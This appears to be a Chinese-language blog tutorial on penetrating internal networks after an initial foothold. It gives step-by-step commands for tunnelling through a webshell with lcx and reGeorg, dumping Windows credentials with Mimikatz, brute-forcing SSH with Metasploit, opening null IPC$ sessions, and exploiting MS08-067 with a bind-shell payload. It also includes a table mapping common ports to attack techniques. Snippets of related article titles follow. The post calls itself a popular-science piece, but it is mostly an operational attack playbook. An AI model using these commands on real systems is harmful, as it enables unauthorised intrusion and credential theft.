内网渗透+基础+工具使用=自己理解

目录

1.代理

2.内网命令

3.抓密码

4.ipc$共享目录利用

5.端口漏洞

6.溢出

1.代理

端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等……..

下面介绍我比较喜欢的2款工具LCX+ socks5

1.lcx

路由器加端口 TCP协议 ,固定IP地址本机

大马设置

Local Ip : 转发ip

Local Port : 转发端口

Remote Ip :本机ip (ip138.com外网ip)

Remote Port : 路由器上面设置的端口

Lcx上面执行:

lcx.exe  -listen 3839 38390

2.reGeorg + proxifier

SOCKS:下载地址: https://github.com/sensepost/reGeorg

配置文件

Vim /etc/proxychains.conf

添加socks5 127.0.0.1 8090 (端口和监听端口要一样)

使用方法:

python reGeorgSocksProxy.py -u http://xxx.com/sk5.php -p 8090

上传一个脚本(asp,php,jsp,ashx)到webshell上

这些reGeorgSocksProxy.py脚本,监听shell端口

Win下面使用proxifier连接

配置文件-代理服务

Ip地址设置kali本机ip

2.内网常用的命令

ipconfig /all

查询ip判断有没有域服务,ps:大型网络一般都有dns服务器域。

net view /domain,我们可以知道有1个域。

Net view

查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来

可以参考以下是经用的内网渗透命令:

命令大全 (转t00ls:backlion

3. 抓密码

Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

第一条:privilege::debug      //提升权限

第二条:sekurlsa::logonpasswords           //抓取密码

记录 Mimikatz输出:

第一条:””privilege::debug”” “”log sekurlsa::logonpasswords full”” exit && dir

将输出导入到本地文件:

第二条:””privilege::debug”” “”sekurlsa::logonpasswords full”” exit >> log.txt

SAMInside

这款工具有利有弊:

  1. 有时候抓不出密码,安全环境。(弊)
  2. 抓出的密码有时候破解网站破解不出SAMInside工具是跑密码表,一般都可以破解。

抓出来的密码可以使用爆破工具扫描。。。。。PS(首先要知道里面有流量监控,防火墙?)

推荐使用:

Linux  metasploit

use auxiliary/scanner/ssh/ssh_login 选择ssh口令猜解模块

set RHOSTS 192.168.1.105  扫描的ip地址

set USERNAME root  扫描的用户名为root

set PASS_FILE/root/password.txt   设置字典

set THREADS 20   设置线程根据实际情况设置

show options    查看设置信息

run    开始扫描

win推荐使用ntscan扫描速度非常快

4.ipc$共享目录

使用命令 net use url=file://\\IP\ipc$\\IP\ipc$ “” /user:”” 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。(来源百度)

利用工具 流光,DTools 的IPC$探测功能,可进行扫描(ps:建议摸清楚内网有没有监控)

或者使用 \\可以查询管理员链接过那一台服务器

\\192.168.0.77

\\192.168.0.77\c$ (进入c盘)

或者网络处查看

Ps:(真实案例)

我通过tomcat拿到了一台服务器,但是那一台服务器密码不通杀,我什么扫描192.168.x.x所有网站,只扫描出几个都是一些路由器,tomcat(没有弱口令),我通过tomcat的一台共享ipc$拿下的服务器。

5.端口漏洞

端口号 端口说明 攻击技巧
21/22/69 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门
22 ssh:远程连接 爆破OpenSSH;28个退格
23 telnet:远程连接 爆破\嗅探
25 smtp:邮件服务 邮件伪造
53 DNS:域名系统 DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙
67/68 dhcp 劫持\欺骗
110 pop3 爆破
139 samba 爆破\未授权访问\远程代码执行
143 imap 爆破
161 snmp 爆破
389 ldap 注入攻击\未授权访问
512/513/514 linux r 直接使用rlogin
873 rsync 未授权访问
1080 socket 爆破:进行内网渗透
1352 lotus 爆破:弱口令\信息泄漏:源代码
1433 mssql 爆破:使用系统用户登录\注入攻击
1521 oracle 爆破:TNS\注入攻击
2049 nfs 配置不当
2181 zookeeper 未授权访问
3306 mysql 爆破\拒绝服务\注入
3389 rdp 爆破\Shift后门
4848 glassfish 爆破:控制台弱口令\认证绕过
5000 sybase/DB2 爆破\注入
5432 postgresql 缓冲区溢出\注入攻击\爆破:弱口令
5632 pcanywhere 拒绝服务\代码执行
5900 vnc 爆破:弱口令\认证绕过
6379 redis 未授权访问\爆破:弱口令
7001 weblogic Java反序列化\控制台弱口令\控制台部署webshell
80/443/8080 web 常见web攻击\控制台爆破\对应服务器版本漏洞
8069 zabbix 远程命令执行
9090 websphere控制台 爆破:控制台弱口令\Java反序列
9200/9300 elasticsearch 远程代码执行
11211 memcacache 未授权访问
27017 mongodb 爆破\未授权访问

转网络

6.溢出

当通过VPN进入内网web搞不定,可以试试系统漏洞,内网补丁很少的情况下可以试试远程溢出。

推荐2个exp网站:

https://www.exploit-db.com/
https://www.kernel-exploits.com/
扫描漏洞我们可以通过nmap或者Nessus扫描内网漏洞,推荐使用nmap,Nessus扫描动静太大容易发现。

案例:仅供参考(ps:这个是好久以前搞的一台内网)

使用Metasploit

use exploit/windows/smb/ms08_067_netapi  加载漏洞模块

set LHOST  本机IP

set RHOST   目标ip

set payload windows/shell_bind_tcp        payload

show options  看看有没有什么设置错误的地方。

Exploit   攻击

====================邪恶的分割线============================

科普型文章,用了很多工具和网上方法,如有问题请大牛指点!!!

时间: 2024-10-03 22:00:14

内网渗透+基础+工具使用=自己理解的相关文章

内网渗透基础:内网、域、工作组、域控概念介绍

一.什么是内网 局域网(Local Area Network, LAN),又称内网,是指在某一区域内由多台计算机互联成的计算机组. 局域网可以实现文件管理.应用软件共享.打印机共享.扫描仪共享.工作组内的日程安排.电子邮件和传真通信服务等功能.局域网严格意义上是封闭型的.它可以由办公室内几台甚至上千台计算机组成.决定局域网的主要技术要素为:网络拓扑,传输介质与介质访问控制方法. 局域网标准定义了传输媒介.编码和介质访问等底层(一二层)功能.要使数据通过复杂的网络结构传输到达目的地,还需要具有寻址

内网渗透思路

Sky's自留地 关注互联网安全,关注安全&攻击技术. 搜索关键字搜索 首页申请链接 内网渗透测试思路[转自网络] 作者: sky 孵化于: March 15, 2015 家属: 学习类,技术类 访问: 2,136 次 写在前面渗透测试是门技术,也是一门艺术.这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样:但是在这个过程中,思路无疑是最重要的,没有做不到只有想不到,就跟咱们高中解题时有了思路就迎刃而解一样,手里拿着铲子(技巧

浅谈内网渗透

引子离上篇文章的时间过去很久了,答应写一篇内网渗透的文章,今天抽点时间,把这个坑给添平了吧.标题是浅谈,所以我不认为自己能在内网渗透写的有多深入.渗透这玩意更多是经验,积累的多了自然水到渠成.而且我个人认为很多前辈人物都已经写的很好了,我这里纯粹抛砖引玉,把前辈级人物的经验集成在一起,也算基础篇吧.如果有不足的地方或者有更好的实现方法,欢迎随时交流.交流方式就以邮件吧,邮件地址在文章结束处,上次公开的Q加了很多人,即时通讯=即时打扰,过段时间集中清理,如果不小心被清理了,诸位勿怪,这里算是提前打

记录一次坎坷的linux内网渗透过程瞎折腾的坑

写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux  2.6.32-358  cpu 架构(x86_64)AND发行版 Red Hat Enterprise Linux Server release 6.4 2.DMZ+防火墙+行为监控,外网开放8080 8084 ... 3.服务器有utibadn用户的权限一枚 Shell具体怎么拿到的就不说了,记录下自己比较思路坎坷的一次内网渗透以作回顾: 外网nmap得到

安天实战课题研究2017年第二期内网渗透技术题目

安天实战课题研究2017年第二期内网渗透技术题目拟研究以下题目:1.使用NTScan扫描内网Windows口令(已经完成)2.使用Hscan进行内网口令扫描 (已经完成)3.扫描Mysql口令 (已经完成)4.扫描MSSQL口令 (已经完成)5.使用SQLTools查看SQL Server数据库及提权 (已经完成)6.内网信息收集工具7.内网信息自动收集脚本8.内网密码获取工具9.服务器明文密码及hash获取10.Windows及Linux密码哈希破解11.远程终端使用攻略 (已经完成)12.记

内网渗透测试思路-FREEBUF

(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接. ① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行 探测的. I: 不具备系统权限: ①  Ser

(原创)校园卡破解系列三(完结篇)---内网渗透

上午大课间十几分钟搞定! 在班上电脑  因为内网渗透 先看看本地ip  172.18.33.38 然后就想着扫一下网段  随手输了172.18.32.0-172.18.33.0 扫内网端口的工具挺多的  最顺手其实是kali里面用msf一个模块扫 那个能直接爆破一些端口 但是考虑到班上电脑xp的辣鸡机子 而且时间不允许 所以直接写个php来扫内网端口也就是如图的 13.php 下载个phpstudy+这个文件  5分钟搞定 扫完就第一眼看到 172.18.32.5开了个8000端口  下意识猜测

内网渗透学习

在乌云看到了这篇文章,看的我太爽了. 从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备  披露状态: 2015-02-18: 细节已通知厂商并且等待厂商处理中2015-02-27: 厂商已经确认,细节仅向厂商公开2015-03-09: 细节向核心白帽子及相关领域专家公开2015-03-19: 细节向普通白帽子公开2015-03-29: 细节向实习白帽子公开2015-04-04: 细节向公众公开 简要描述: 本来打算发人人网的,但是苦逼的是我刚进去内网就貌似被t出来了,服务器直接宕了,等

内网渗透常用手法

作者:凋凌玫瑰来源:NCPH 内网,很多人应该形成了这个概念,很多大型网络的外部网站或是服务器不一定有用,当然外网也是一个突破口.很多时候我们直接从外网入手,随着安 全的不断加固,已变得越来越困难.那么黑客通常是怎么进行内网渗透的,内网渗透又是怎样与社会工程学联系起来呢,今天主要描述黑客内网渗透的常用操作手 法,关于如何获得内网机器,请查找我以前的一篇文章<内网渗透—如何打开突破口>. 渗透的过程就是一个信息刺探.利用.思考.突破的过程.首先在我们获得一台内网的机器后应该怎么做,当然是信息刺探